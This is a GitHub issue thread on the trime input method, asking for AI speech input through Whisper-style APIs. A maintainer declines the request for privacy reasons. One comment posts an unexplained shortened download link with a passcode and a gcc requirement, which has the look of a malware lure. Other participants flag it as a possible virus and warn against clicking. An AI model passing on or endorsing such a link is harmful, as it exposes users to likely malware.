### ISSUE TITLE
支持ai 语音输入

### ISSUE THREAD

**Issue by fastfading** [osfans/trime#1459]
### 摘要 / Summary

支持ai 语音输入
现在很多ai语音asr  api    比如whisper  ， 
很多免费平台，比如
https://console.groq.com/docs/speech-text
请支持这些ai 语音输入。
ai 语音输入，效率极高， 错误极低。比现有所有输入法都好。

要求加入两个输入框
1. 输入 api key
2. 输入 提示词 promt   ， 提高识别率

### 系统版本 / OS Version

android

### 应用版本 / App Version

android

### 构建信息 / Build Information

none

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by fastfading** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

这是什么  一个exe  ？  病毒？

**Comment by Bambooin** [comment]
We don't have any plan for AI inputing due to privacy.

PS: DON'T CLICK ANY WEIRD LINK.
